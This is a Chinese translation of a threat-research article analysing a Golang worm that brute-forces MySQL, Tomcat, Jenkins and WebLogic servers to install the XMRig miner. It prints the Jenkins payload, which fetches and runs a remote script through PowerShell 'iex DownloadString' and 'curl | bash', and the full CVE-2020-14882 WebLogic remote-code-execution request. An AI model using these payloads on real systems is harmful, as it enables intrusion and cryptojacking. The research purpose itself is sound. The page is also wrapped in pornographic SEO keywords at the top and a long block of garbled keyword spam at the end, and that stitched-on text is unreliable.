国产精品电影_久久视频免费_欧美日韩国产激情_成年人视频免费在线播放_日本久久亚洲电影_久久都是精品_66av99_九色精品美女在线_蜜臀a∨国产成人精品_冲田杏梨av在线_欧美精品在线一区二区三区_麻豆mv在线看

Golang蠕蟲將Windows和Linux服務器變成門羅幣挖礦機

安全
使用Golang語言開發多平臺惡意軟件是2020年惡意軟件的發展趨勢。

[[374355]]

使用Golang語言開發多平臺惡意軟件是2020年惡意軟件的發展趨勢。2020年12月初,研究人員發現了一個新的用Golang語言編寫的蠕蟲。該蠕蟲嘗試在網絡中傳播來大規模地運行XMRig挖礦機。惡意軟件的目標是Windows和Linux服務器。在老版本中,該蠕蟲嘗試利用WebLogic的漏洞——CVE-2020-14882。

研究人員分析發現,攻擊者持續更新C2服務器上的蠕蟲,表明惡意軟件開發者非常活躍,而且在未來的更新中可能會攻擊其他弱配置的服務。

技術分析

攻擊者使用了3個文件:

· 釋放器腳本(bash或powershell);

· Golang二進制蠕蟲;

· XMRig 挖礦機。

這3個文件都位于同一C2服務器上。

截止目前,ELF 蠕蟲二進制文件和bash 釋放器腳本在VirusTotal 中都沒有檢測到。圖1是VirusTotal 對ELF 蠕蟲二進制文件的檢測結果。


圖 1: VirusTotal 對ELF 蠕蟲二進制文件的檢測結果

惡意軟件在Windows和Linux操作系統上的行為非常相似。下面對Linux蠕蟲的工作流進行分析。

Linux蠕蟲工作流

蠕蟲執行后會檢查受感染的機器上是否有進程在監聽52013端口。端口監聽器的存在是一個mutex互斥量。如果端口的socket已經開放,惡意軟件實例就會退出,否則就會打開一個端口的網絡socket。

在老版本中,蠕蟲會解壓XMRig 挖礦機為Network01到tmp文件夾中,并運行。挖礦機會使用Go資源嵌入包(go-bindata)嵌入到Golang二進制文件中,惡意軟件會使用bindataFile來解壓嵌入的XMRig 挖礦機。圖2是文件中的函數:


圖 2: xmrig_linux_amd64.go文件

惡意軟件會使用TCP SYN掃描網絡來找到可以暴力破解的服務,并在網絡中傳播。然后掃描有與這些服務相關的開放端口的IP,Tomcat 和 Jenkins的端口是8080,MySQL的端口是3306,WebLogic的端口是7001。這些漏洞利用中在src exp代碼下有一個包。


圖 3: “exp”包文件和函數

蠕蟲使用gopacket庫來提供Go語言的C綁定,用libpcap來讀取網絡包。通過運行pcapc,蠕蟲會收集網絡數據并繼續對服務進行暴力破解。圖4是蠕蟲暴力破解和嘗試在Tomcat和MySQL服務上進行漏洞利用的結果。


圖 4: 蠕蟲結果片段

漏洞利用后,惡意軟件會傳播一個加載器腳本:Linux系統是ld.sh,Windows平臺是ld.ps1。加載器負責釋放和運行XMRig挖礦機和Golang 蠕蟲。圖5和圖6是加載器腳本。


圖 5: ldr.sh –Linux平臺的釋放器bash腳本


圖 6: ldr.ps1 script – Windows平臺的釋放器 powershell腳本

漏洞利用流

下面描述每個服務的攻擊流:

MySql: Port 3306

惡意軟件會運行憑證暴力破解攻擊。惡意軟件會使用硬編碼的弱憑證目錄,比如root:123456。

成功登陸后,惡意軟件會使用mysql UDF運行shellcode來獲取本地權限提升。漏洞利用以十六進制字符串的形式嵌入在二進制文件中。蠕蟲對不同的操作系統和架構有不同的漏洞利用,設計的系統和架構有UDFLINUX32、UDFLINUX64、UDFLWIN32和UDFWIN64。

運行漏洞利用后,payload會用sys_exec 命令來釋放和運行加載器腳本。URLWIN 和URLLINUX 保存釋放器腳本URL。圖7和圖8是每個操作系統對應的payload。


圖 7: MySQL查詢– Linux payload


圖 8: MySQL 查詢– Windows payload

Tomcat: Port 8080

惡意軟件會使用基本認證在管理員面板上運行憑證填充。


圖 9: 到Tomcat管理員面板的認證請求示例

成功嘗試后,惡意軟件會嘗試部署一個WAR文件,用來傳輸含有惡意payload的1.jsp 文件。

惡意軟件會發送Get請求,并分析jsp文件 %s/1.jsp?win=%s&linux=%s 的參數。這些參數中含有釋放器腳本URL。然后,JSP腳本會釋放和運行其加載器。


圖 10: 1.jsp文件腳本

Jenkins: Port 8080

與之前漏洞利用類似,惡意軟件會用口令填充來暴力破解Jenkins 登陸,并運行以下payload:

  1. cmd@/c@powershell iex(New-Object Net.WebClient).DownloadString(‘%s’)!bash@-c@(curl -fsSL %s || wget -q -O – %s) | bash 
  2. println “%s”+”%s”;def s=new String(Base64.getDecoder().decode(“%s”+”%s”.reverse())).split(“!”);def c=System.getProperty(“os.name”).contains(“indo”)?s[0].split(“@”):s[1].split(“@”);c.execute() 
  3. WebLogic: Port 7001 

 在之前版本中,惡意軟件會用最新的WebLogic 遠程代碼執行漏洞利用CVE-2020-14882。惡意軟件會發送到WebLogic服務的get請求,并使用GET請求header 作為payload的一部分。

  1. GET 
  2. /console/css/%%25%%32%%65%%25%%32%%65%%25%%32%%66consolejndi.portal?test_handle=com.tangosol.coherence.mvel2.sh.ShellSession(‘weblogic.work.ExecuteThread 
  3. %%20currentThread(weblogic.work.ExecuteThread)Thread.currentThread();weblogic.work
  4. WorkAdapter%%20adapter=currentThread.getCurrentWork();java.lang.reflect.Field%%20 
  5. field=adapter.getClass().getDeclaredField(“connectionHandler”);field.setAccessible 
  6. (true);Object%%20obj=field.get(adapter);weblogic.servlet.internal.ServletRequestI 
  7. mpl%%20req(weblogic.servlet.internal.ServletRequestImpl)obj.getClass().getMethod 
  8. (“getServletRequest”).invoke(obj);String%%20cmd=req.getHeader(“cmd”);String[]%% 
  9. 20cmds=System.getProperty(“os.name”).toLowerCase().contains(“win”)?new%%20String[]{“cmd.exe”,”/c”,req.getHeader(“win”)}:new%%20String[]{“/bin/sh”,”c”,req.getHeader 
  10. (“linux”)};if(cmd!=null{String%%20result=new%%20java.util.Scanner(new%%20java.lang 
  11. .ProcessBuilder(cmds).start().getInputStream()).useDelimiter(“%%5C%%5CA”).next(); 
  12. weblogic.servlet.internal.ServletResponseImpl%%20res(weblogic.servlet.internal. 
  13. ServletResponseImpl)req.getClass().getMethod(“getResponse”).invoke(req);work
  14. getServletOutputStream().writeStream(new%%20weblogic.xml.util.StringInputStream 
  15. (result));work.getServletOutputStream().flush 
  16. ();}currentThread.interrupt();’) HTTP/1.0 
  17. Host: %s:%d 
  18. User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:82.0) Gecko/20100101 Firefox/82.0 
  19. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 
  20. Connectionclose 
  21. cmd: ls 
  22. linux: ( (curl -fsSL %s || wget -q -O – %s) | bash& ) 
  23. win: start powershell iex(New-Object Net.WebClient).DownloadString(‘%s’) 

 總結

在2020年,研究人員發現許多攻擊不同平臺的Golang惡意軟件,包括Windows、Linux、Mac和安卓。研究人員認為這一趨勢在2021年將會繼續。此外,蠕蟲的PE和ELF版本代碼幾乎完全相同。

本文翻譯自:https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/如若轉載,請注明原文地址。

 

責任編輯:姜華 來源: 嘶吼網
相關推薦

2021-01-03 17:11:42

WindowsLinux蠕蟲

2021-04-26 23:27:41

僵尸網絡漏洞惡意代碼

2021-01-04 13:23:56

僵尸網絡加密貨幣漏洞

2025-07-18 13:17:23

2021-12-23 14:05:31

態勢感知/挖礦木馬

2021-08-10 10:37:43

惡意軟件挖礦網絡攻擊

2025-06-23 09:58:52

2021-04-27 19:23:47

服務器工具redis

2021-01-04 08:23:24

蠕蟲惡意軟件雙因素認證

2022-04-24 14:11:26

病毒僵尸網絡網絡攻擊

2009-08-20 16:48:17

路由器LINUXLINUX內核

2018-08-29 08:43:11

2010-03-26 18:36:53

惡意程序病毒卡巴斯基

2009-12-16 16:48:35

Linux操作系統

2012-09-20 09:17:18

LinuxWindows

2012-09-20 15:54:46

LinuxWindows服務器

2020-05-25 07:00:58

Raspberry PWeb服務器

2015-06-25 09:13:44

2010-10-25 14:10:14

Linux無線網卡

2020-07-16 11:51:37

漏洞WindowsDNS服務器
點贊
收藏

51CTO技術棧公眾號

亚洲午夜91| 日本a级黄色| 久久久国产欧美| 一区中文字幕电影| 在线精品国精品国产尤物884a| 手机看片福利日韩| sm国产在线调教视频| 成人美女视频| 欧美91大片| 亚洲欧洲在线观看av| 中文字幕精品一区二区精品绿巨人 | 久久男女视频| www日韩欧美| 手机av免费在线| 亚洲观看高清完整版在线观看| 亚洲午夜久久久影院伊人| 久久久精品久久久久久96| 欧美日韩不卡合集视频| 韩国主播福利视频一区二区三区| 亚洲一级不卡视频| 日韩一区二区三区不卡视频| 天堂av在线一区| 久久国产一区二区| 女人香蕉久久**毛片精品| 午夜精品福利在线观看| 新版的欧美在线视频| 日韩欧美成人午夜| 午夜成人影视| 久久欧美中文字幕| 92看片淫黄大片一级| 久久99精品久久久久| 一区二区视频国产| 麻豆成人久久精品二区三区小说| 亚洲综合一区二区不卡| 91亚洲自偷观看高清| 亚洲一区中文字幕| 青青草成人影院| 成人免费激情视频| 欧美日韩福利| 日本成人黄色免费看| 亚洲中字在线| 天堂а√在线中文在线| 99在线热播精品免费| 国产主播福利| 欧美日韩国产精品| 婷婷在线播放| 不卡av电影院| 日本久久精品| 明星裸体视频一区二区| 日韩激情中文字幕| 成人免费看黄网址| 欧美一区二区免费| 精品久久ai| 精品综合久久久| 久久精品一级爱片| 超碰免费在线| 久久理论片午夜琪琪电影网| 尤物在线精品| www.日本xxxx| 欧美videossexotv100| 亚洲欧洲一二区| 成人有码在线播放| 国产成人在线看| 五丁香在线视频| 欧美激情精品久久久久久大尺度 | 欧美日韩精品欧美日韩精品| heyzo高清中文字幕在线| 97精品视频在线| 国产一区二区剧情av在线| 中文在线a√在线8| 北条麻妃99精品青青久久| 日韩一级大片| 久久午夜夜伦鲁鲁一区二区| 精品国产在天天线2019| 天天做天天爱天天综合网| 国产主播中文字幕| 亚洲精品久久久久| 午夜久久99| 宅男视频免费在线观看视频| 亚洲女同性videos| aⅴ色国产欧美| 香蕉视频在线网站| 日韩av电影院| 中文字幕国产精品一区二区| 在线黄色网页| 免费成人在线观看av| 欧美日韩电影在线| 99精品国产一区二区青青牛奶 | 国产一区二区欧美| 四虎国产精品成人免费4hu| 久久九九有精品国产23| 国产一区二区福利视频| freexxx性亚洲精品| 亚洲精品中字| 日韩欧美中文字幕制服| 免费在线观看精品| a级片免费在线观看| 天天综合色天天综合色hd| 亚洲黄页视频免费观看| 精一区二区三区| av在线亚洲一区| 国产一级粉嫩xxxx| 国产精品欧美日韩一区二区| 中文字幕日韩av资源站| 欧洲杯足球赛直播| 国产美女性感在线观看懂色av | 日韩视频免费观看高清在线视频| 欧美欧美全黄| 欧美艳星kaydenkross| h无码动漫在线观看| 久久精视频免费在线久久完整在线看| 99精品国产91久久久久久| 欧美一区二区三区高清视频| 欧美写真视频一区| 免费观看成人在线| 一个色综合导航| 亚洲一区二区三区在线看| 好吊日精品视频| 345成人影院| 97在线影院| 欧美久久在线| 久久这里有精品| 6080国产精品一区二区| 国产乱码字幕精品高清av| 伦理一区二区三区| www久久日com| 日韩欧美在线播放视频| 古典武侠综合av第一页| 欧美黄色小视频| 欧美va亚洲va香蕉在线| 欧美国产精品一区| 久久精品国产999大香线蕉| 久久人体视频| 99热免费精品在线观看| 夜久久久久久| 狠狠色狠狠色综合| 中文字幕 久热精品 视频在线| 亚洲精品少妇30p| 制服丝袜成人动漫| 国产精品美女视频| 中国女人久久久| 老色鬼在线视频| 最新av网站在线观看| 青青成人在线| 久久久www成人免费毛片麻豆 | 国产成人在线视频免费观看| 50度灰在线观看| 日韩中文第一页| 国产一区二区你懂的| 日韩欧美高清一区二区三区| 青青草精品视频在线观看| 日韩精品一区二区三区四区视频| 深爱激情综合网| 国产在线美女| 91人人澡人人爽人人精品| 国产精品久久av| 日韩免费福利电影在线观看| 久久久久久免费毛片精品| 91成人精品观看| 国产精品电影| 少妇精品久久久一区二区三区 | 国产成人精品久久| 91视频免费进入| 久久国产色av免费观看| 国产精品久久一区二区三区不卡 | 欧美激情视频网址| 蜜桃成人在线| 亚洲一区二区三区成人| 最新中文字幕av专区| 久草综合在线观看| 午夜在线观看视频网站| 男女羞羞在线观看| 日韩欧美中文字幕一区二区三区 | 麻豆精品久久精品色综合| 国产剧情一区二区三区| 一区视频在线播放| 日韩精品中文字幕在线不卡尤物| 久久av.com| 91av免费看| 91传媒免费视频| 亚洲激情文学| 国产一区二区三区黄网站| 国产精品嫩草99av在线| 欧美激情综合五月色丁香小说| 亚洲最大色网站| 中日韩午夜理伦电影免费 | 性史性dvd影片农村毛片| 快射视频在线观看| 激情视频极品美女日韩| 国产一区在线观看视频| 欧美日韩亚洲国产一区| 欧美成人性色生活仑片| 宅男av一区二区三区| 国产三级av在线| 久久悠悠精品综合网| 国产999精品久久久久久| 制服丝袜日韩国产| 欧美一区二区视频在线| 翔田千里一区| 成人av二区|